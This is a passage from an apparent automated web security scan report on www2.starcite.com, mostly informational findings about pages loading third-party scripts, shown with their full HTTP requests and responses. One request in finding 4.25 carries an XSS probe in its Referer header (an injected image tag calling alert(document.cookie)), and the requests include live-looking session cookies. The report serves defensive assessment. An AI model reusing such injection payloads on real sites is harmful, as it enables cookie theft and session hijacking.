GET /starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:25:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:25:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:47:58 GMT;path=/
Content-Length: 18313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta name="Descrip
...[SNIP]...
<td width="239" align="right"><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=1bce6fcf-d300-49d6-963d-c747256f2575&amp;headerbg=%231B9BA4&amp;inactivebg=%2312888C&amp;inactivefg=%23FFFFFF&amp;linkfg=%231B9BA4"></script>
...[SNIP]...

4.14. http://www2.starcite.com/starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:12:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=35
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:35:22 GMT;path=/
Content-Length: 17925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta name="Descrip
...[SNIP]...
<td width="239" align="right"><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=1bce6fcf-d300-49d6-963d-c747256f2575&amp;headerbg=%231B9BA4&amp;inactivebg=%2312888C&amp;inactivefg=%23FFFFFF&amp;linkfg=%231B9BA4"></script>
...[SNIP]...

4.15. http://www2.starcite.com/starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:08 GMT;path=/
Content-Length: 19158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta name="Descrip
...[SNIP]...
<td width="239" align="right"><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=1bce6fcf-d300-49d6-963d-c747256f2575&amp;headerbg=%231B9BA4&amp;inactivebg=%2312888C&amp;inactivefg=%23FFFFFF&amp;linkfg=%231B9BA4"></script>
...[SNIP]...

4.16. http://www2.starcite.com/starcite/node/100

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/node/100

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/node/100 HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:12:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=41
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:48 GMT;path=/
Content-Length: 13694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.17. http://www2.starcite.com/starcite/node/335/445

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/node/335/445

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /starcite/node/335/445 HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:47:30 GMT;path=/
Content-Length: 15012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
<td width="239" align="right"><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=1bce6fcf-d300-49d6-963d-c747256f2575&amp;headerbg=%231B9BA4&amp;inactivebg=%2312888C&amp;inactivefg=%23FFFFFF&amp;linkfg=%231B9BA4"></script>
...[SNIP]...

4.18. http://www2.starcite.com/starcite/node/929

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/node/929

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/node/929 HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:12:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:44 GMT;path=/
Content-Length: 13741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.19. http://www2.starcite.com/starcite/planners/findtherightsolution

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/planners/findtherightsolution

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/planners/findtherightsolution HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:46:55 GMT;path=/
Content-Length: 29497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta name="Desc
...[SNIP]...
</script><script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.20. http://www2.starcite.com/starcite/planners/howitworks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/planners/howitworks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/planners/howitworks HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:13 GMT;path=/
Content-Length: 26501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.21. http://www2.starcite.com/starcite/planners/meetings1-1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/planners/meetings1-1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/planners/meetings1-1 HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:10 GMT;path=/
Content-Length: 17018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.22. http://www2.starcite.com/starcite/planners/requestmoreinformation

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/planners/requestmoreinformation

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/planners/requestmoreinformation HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:47:00 GMT;path=/
Content-Length: 52367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.23. http://www2.starcite.com/starcite/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/privacy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/privacy HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:15:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:15:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:37:40 GMT;path=/
Content-Length: 50747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.24. http://www2.starcite.com/starcite/resource/findresources

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/resource/findresources

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/resource/findresources HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:11:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:59 GMT;path=/
Content-Length: 29216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.25. http://www2.starcite.com/starcite/resourcecenter/downloads/a

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/resourcecenter/downloads/a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /starcite/resourcecenter/downloads/a HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 14:26:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:26:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:50 GMT;path=/
Content-Length: 36918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
<td width="93" align="right"><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=1bce6fcf-d300-49d6-963d-c747256f2575&amp;headerbg=%231B9BA4&amp;inactivebg=%2312888C&amp;inactivefg=%23FFFFFF&amp;linkfg=%231B9BA4"></script>
...[SNIP]...

4.26. http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:11:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=76
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:20 GMT;path=/
Content-Length: 38834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
<td width="93" align="right"><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=1bce6fcf-d300-49d6-963d-c747256f2575&amp;headerbg=%231B9BA4&amp;inactivebg=%2312888C&amp;inactivefg=%23FFFFFF&amp;linkfg=%231B9BA4"></script>
...[SNIP]...

4.27. http://www2.starcite.com/starcite/resourcecenter/downloads/how-sunshine-provisions-impact-meetings-management

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/resourcecenter/downloads/how-sunshine-provisions-impact-meetings-management

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /starcite/resourcecenter/downloads/how-sunshine-provisions-impact-meetings-management HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:43 GMT
